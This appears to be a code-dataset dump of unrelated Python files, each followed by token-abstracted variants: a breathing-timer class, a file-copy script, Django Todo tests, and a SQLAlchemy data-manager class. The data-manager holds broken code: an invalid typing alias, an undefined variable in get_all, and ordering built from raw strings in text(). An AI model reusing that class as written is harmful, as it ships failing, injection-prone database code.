' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<class token>\n<assignment token>\n<code token>\n" ]
false
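Record 35 is a Wim Hof-style breathing timer with Russian voice prompts (the module docstring reads "number of rounds, breaths per round, breath hold on the inhale"; "Глубокий вдох" is "deep breath", "Раунд" is "round", "Выдох" is "exhale"). The notable mechanism is `Workout.say`: each utterance runs `speak` in a fresh thread but joins it immediately under a lock, presumably because a pyttsx3 engine is not safe to drive from several threads at once. The pattern in isolation:

# The serialization pattern from Workout.say; `speak` here is a stand-in
# for the record's pyttsx3-backed function.
import threading

lock = threading.Lock()


def speak(what):
    print('saying:', what)


def say(what):
    with lock:  # same effect as the record's acquire()/release()
        thread = threading.Thread(target=speak, kwargs={'what': what})
        thread.start()
        thread.join()  # block until speech finishes before releasing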
36
4f0933c58aa1d41faf4f949d9684c04f9e01b473
from os.path import exists

from_file = input('from_file')
to_file = input('to_file')

print(f"copying from {from_file} to {to_file}")
indata = open(from_file).read()  # reading this way, no explicit close is needed
print(f"the input file is {len(indata)} bytes long")

print(f"does the output file exist? {exists(to_file)}")
print("return to continue, CTRL-C to abort")
input('?')

open(to_file,'w').write(indata)  # no close needed

print("done!")
[ "from os.path import exists\n\nfrom_file = input('form_file')\nto_file = input('to_file')\n\nprint(f\"copying from {from_file} to {to_file}\")\nindata = open(from_file).read()#这种方式读取文件后无需close\nprint(f\"the input file is {len(indata)} bytes long\")\n\nprint(f\"does the output file exist? {exists(to_file)}\")\nprint(\"return to continue, CTRL-C to abort\")\ninput('?')\n\nopen(to_file,'w').write(indata)#无需close\n\nprint(\"done!\")\n\n", "from os.path import exists\nfrom_file = input('form_file')\nto_file = input('to_file')\nprint(f'copying from {from_file} to {to_file}')\nindata = open(from_file).read()\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\nfrom_file = input('form_file')\nto_file = input('to_file')\nprint(f'copying from {from_file} to {to_file}')\nindata = open(from_file).read()\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\n<assignment token>\nprint(f'copying from {from_file} to {to_file}')\n<assignment token>\nprint(f'the input file is {len(indata)} bytes long')\nprint(f'does the output file exist? {exists(to_file)}')\nprint('return to continue, CTRL-C to abort')\ninput('?')\nopen(to_file, 'w').write(indata)\nprint('done!')\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
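Record 36 copies one file to another and leans on `open(...).read()` without an explicit `close()`, which only works because CPython happens to close the handle when it is garbage-collected. The context-manager form makes the cleanup deterministic:

# Record 36's copy logic with explicit context managers, so both file
# handles are closed deterministically instead of at GC time.
from os.path import exists

from_file = input('from_file ')
to_file = input('to_file ')

print(f"copying from {from_file} to {to_file}")
with open(from_file) as src:
    indata = src.read()
print(f"the input file is {len(indata)} bytes long")
print(f"does the output file exist? {exists(to_file)}")
input("return to continue, CTRL-C to abort ")

with open(to_file, 'w') as dst:
    dst.write(indata)
print("done!")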
37
5c81ddbc8f5a162949a100dbef1c69551d9e267a
# -*- coding: utf-8 -*- from django.test import TestCase from django.contrib.auth.models import User from ..models import Todo class MyTestCase(TestCase): def test_mark_done(self): user = User.objects.create_user(email='user@…', username='user', password='somepasswd') todo = Todo(title='SomeTitle', description='SomeDescr', owner=user) res = todo.mark_done(user) self.assertTrue(res) self.assertEqual(Todo.objects.count(), 1) def test_mark_done_already_done(self): user = User.objects.create_user(email='user@…', username='user', password='somepasswd') todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user) res = todo.mark_done(user) self.assertIsNone(res) # todo not saved because mark_done don't save already done todos self.assertEqual(Todo.objects.count(), 0)
[ "# -*- coding: utf-8 -*-\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user', password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n # todo not saved because mark_done don't save already done todos\n self.assertEqual(Todo.objects.count(), 0)\n", "from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom ..models import Todo\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n\n def test_mark_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)\n res = todo.mark_done(user)\n self.assertTrue(res)\n self.assertEqual(Todo.objects.count(), 1)\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n <function token>\n\n def test_mark_done_already_done(self):\n user = User.objects.create_user(email='user@…', username='user',\n password='somepasswd')\n todo = Todo(title='SomeTitle', description='SomeDescr', is_done=\n True, done_by=user, owner=user)\n res = todo.mark_done(user)\n self.assertIsNone(res)\n self.assertEqual(Todo.objects.count(), 0)\n", "<import token>\n\n\nclass MyTestCase(TestCase):\n <function token>\n <function token>\n", "<import token>\n<class token>\n" ]
false
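The tests above assert on the behaviour of Todo.mark_done without showing the model itself. For orientation, a minimal sketch of what such a model could look like follows; the real ..models.Todo is not part of this record, so every field name and the save-on-success behaviour below are assumptions inferred from the assertions (an already-done todo returns None and is never saved, an open one is saved and returns a truthy value).

# Hypothetical sketch of the Todo model under test -- the actual ..models.Todo
# is not included in this row; fields and behaviour are inferred from the tests.
from django.conf import settings
from django.db import models


class Todo(models.Model):
    title = models.CharField(max_length=255)
    description = models.TextField(blank=True)
    is_done = models.BooleanField(default=False)
    owner = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='todos',
                              on_delete=models.CASCADE)
    done_by = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True,
                                related_name='done_todos', on_delete=models.SET_NULL)

    def mark_done(self, user):
        if self.is_done:
            return None  # already done: leave the database untouched
        self.is_done = True
        self.done_by = user
        self.save()  # first save, so Todo.objects.count() becomes 1
        return True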
38
509129052f97bb32b4ba0e71ecd7b1061d5f8da2
print(180 / 4)
[ "print (180 / 4)", "print(180 / 4)\n", "<code token>\n" ]
false
39
2c90c4e0b42a75d6d387b9b2d0118d8e991b5a08
import math
import decimal
from typing import Union, List, Tuple

from sqlalchemy import text

from .model import BaseMixin
from ..core.db import db


# Each order is a (field, direction) pair, e.g. ('id', 'desc').
# The original annotation called Set(...) and Union(...) instead of
# subscripting them, which raises at import time.
Orders = List[Tuple[str, Union[str, int, decimal.Decimal]]]


class BaseDBMgr:

    def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict:
        '''Fetch one page of records.
        @param BaseMixin cls_ database model class
        @param set filters query conditions
        @param Orders orders sort order, as (field, direction) pairs
        @param tuple field fields to return
        @param int page page number
        @param int per_page records per page
        @return dict
        '''
        res = {
            'page': {
                'current_page': page,
                'per_page': per_page,
                'total_page': 0,
                'count': 0,
            },
            'items': []
        }
        query = db.query(cls_).filter(*filters)

        if hasattr(cls_, 'deleted_at'):
            query = query.filter(cls_.deleted_at==0)

        res['page']['count'] = query.count()
        res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)

        for order_field, sort in orders:  # don't shadow the `field` parameter
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))

        data = query.offset((page-1)*per_page).limit(per_page)
        if not field:
            res['items'] = [item.to_dict() for item in data]
        else:
            res['items'] = [item.to_dict(only=field) for item in data]

        return res


    def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list:
        '''Fetch all records matching the conditions.
        @param BaseMixin cls_ database model class
        @param set filters query conditions
        @param Orders orders sort order, as (field, direction) pairs
        @param tuple field fields to return
        @param int limit maximum number of records (0 means no limit)
        @return list
        '''
        query = db.query(cls_)

        if filters:
            query = query.filter(*filters)

        if hasattr(cls_, 'deleted_at'):
            query = query.filter(cls_.deleted_at==0)

        for order_field, sort in orders:  # don't shadow the `field` parameter
            sort = 'desc' if sort not in ['asc', 'desc'] else sort
            query = query.order_by(text(f'{order_field} {sort}'))

        if limit != 0:
            query = query.limit(limit)

        items = query.all()  # was `query = query.all()`, leaving `items` undefined below

        if not field:
            items = [item.to_dict() for item in items]
        else:
            items = [item.to_dict(only=field) for item in items]

        return items


    def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict:
        '''Fetch the first record matching the conditions.
        @param BaseMixin cls_ database model class
        @param set filters query conditions
        @param Orders orders sort order, as (field, direction) pairs
        @param tuple field fields to return
        @return dict
        '''
        items = self.get_all(cls_, filters, orders, field, limit=1)
        return items[0] if items else None


    def add(self, cls_:BaseMixin, data:dict)->int:
        '''Insert one record.
        @param BaseMixin cls_ database model class
        @param dict data column values
        @return int primary key of the inserted record
        '''
        item = cls_(**data)
        db.add(item)
        db.flush()
        return item.id


    def update(self, cls_:BaseMixin, data:dict, filters:set)->int:
        '''Update records.
        @param BaseMixin cls_ database model class
        @param dict data column values
        @param set filters filter conditions
        @return int number of affected rows
        '''
        query = db.query(cls_).filter(*filters)

        if hasattr(cls_, 'deleted_at'):
            query = query.filter(cls_.deleted_at==0)

        return query.update(data, synchronize_session=False)


    def delete(self, cls_:BaseMixin, filters:set)->int:
        '''Delete records (soft delete when the model supports it).
        @param BaseMixin cls_ database model class
        @param set filters filter conditions
        @return int number of affected rows
        '''
        query = db.query(cls_).filter(*filters)

        if hasattr(cls_, 'deleted_at'):
            items = query.filter(cls_.deleted_at==0).all()
            for item in items:
                item.delete()
            affect_rows = len(items)
        else:
            affect_rows = query.filter(*filters).delete(synchronize_session=False)
        db.commit()
        return affect_rows


    def count(self, cls_:BaseMixin, filters:set, field=None)->int:
[ "import math\nimport decimal\nfrom typing import Union, List, Set\n\nfrom sqlalchemy import text\n\nfrom .model import BaseMixin\nfrom ..core.db import db\n\n\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), page:int=1, per_page:int=10)->dict:\n '''获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n '''\n res = {\n 'page': {\n 'current_page': page,\n 'per_page': per_page,\n 'total_page': 0,\n 'count': 0,\n },\n 'items': []\n }\n query = db.query(cls_).filter(*filters)\n \n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n\n data = query.offset((page-1)*per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n \n return res\n\n\n def get_all(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=(), limit:int=0)->list:\n '''获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n '''\n query = db.query(cls_)\n \n if filters:\n query = query.filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n\n if limit != 0:\n query = query.limit(limit)\n \n query = query.all()\n\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n \n return items\n\n\n def get_first(self, cls_:BaseMixin, filters:set, orders:Orders=list(), field:tuple=())->dict:\n '''获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n '''\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n\n def add(self, cls_:BaseMixin, data:dict)->int:\n '''插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n '''\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n\n def update(self, cls_:BaseMixin, data:dict, filters:set)->int:\n '''更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n\n return query.update(data, synchronize_session=False)\n\n\n def delete(self, cls_:BaseMixin, filters:set)->int:\n '''更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at==0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session=False)\n db.commit()\n return affect_rows\n\n\n def count(self, cls_:BaseMixin, filters:set, field=None)->int:\n 
'''获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n '''\n query = db.query(cls_).filter(*filters)\n\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at==0)\n \n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "import math\nimport decimal\nfrom typing import Union, List, Set\nfrom sqlalchemy import text\nfrom .model import BaseMixin\nfrom ..core.db import db\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if 
hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\nOrders = List[Set(str, Union(str, int, decimal.Decimal))]\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n 
def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @return dict\n \"\"\"\n items = self.get_all(cls_, filters, orders, field, limit=1)\n return items[0] if items else None\n\n def add(self, cls_: BaseMixin, data: dict) ->int:\n \"\"\"插入一条数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @return int 插入数据的主键\n \"\"\"\n item = cls_(**data)\n db.add(item)\n db.flush()\n return item.id\n\n def update(self, cls_: BaseMixin, data: dict, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param dict data 数据\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = 
db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n return query.update(data, synchronize_session=False)\n\n def delete(self, cls_: BaseMixin, filters: set) ->int:\n \"\"\"更新数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @return int 影响的行数\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n items = query.filter(cls_.deleted_at == 0).all()\n for item in items:\n item.delete()\n affect_rows = len(items)\n else:\n affect_rows = query.filter(*filters).delete(synchronize_session\n =False)\n db.commit()\n return affect_rows\n\n def count(self, cls_: BaseMixin, filters: set, field=None) ->int:\n \"\"\"获取满足条件的总行数\n @param BaseMixin cls 数据库模型实体类\n @param set filters 过滤条件\n @param string|None field 统计的字段\n @return int\n \"\"\"\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n if field is None:\n return query.count()\n else:\n return query.count(field)\n", "<import token>\n<assignment token>\n\n\nclass BaseDBMgr:\n\n def get_page(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), page: int=1, per_page: int=10) ->dict:\n \"\"\"获取分页数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int page 页码\n @param int per_page 每页数据数量\n @return dict\n \"\"\"\n res = {'page': {'current_page': page, 'per_page': per_page,\n 'total_page': 0, 'count': 0}, 'items': []}\n query = db.query(cls_).filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n res['page']['count'] = query.count()\n res['page']['total_page'] = math.ceil(res['page']['count'] / per_page)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n data = query.offset((page - 1) * per_page).limit(per_page)\n if not field:\n res['items'] = [item.to_dict() for item in data]\n else:\n res['items'] = [item.to_dict(only=field) for item in data]\n return res\n\n def get_all(self, cls_: BaseMixin, filters: set, orders: Orders=list(),\n field: tuple=(), limit: int=0) ->list:\n \"\"\"获取所有满足条件的数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 查询条件\n @param str order 排序\n @param tuple field 返回字段\n @param int limit 取数据最大数量\n @return list\n \"\"\"\n query = db.query(cls_)\n if filters:\n query = query.filter(*filters)\n if hasattr(cls_, 'deleted_at'):\n query = query.filter(cls_.deleted_at == 0)\n for order in orders:\n field, sort = order\n sort = 'desc' if sort not in ['asc', 'desc'] else sort\n query = query.order_by(text(f'{field} {sort}'))\n if limit != 0:\n query = query.limit(limit)\n query = query.all()\n if not field:\n items = [item.to_dict() for item in items]\n else:\n items = [item.to_dict(only=field) for item in items]\n return items\n\n def get_first(self, cls_: BaseMixin, filters: set, orders: Orders=list(\n ), field: tuple=()) ->dict:\n \"\"\"获取所有满足条件的第一条数据\n @param BaseMixin cls 数据库模型实体类\n @param set filters 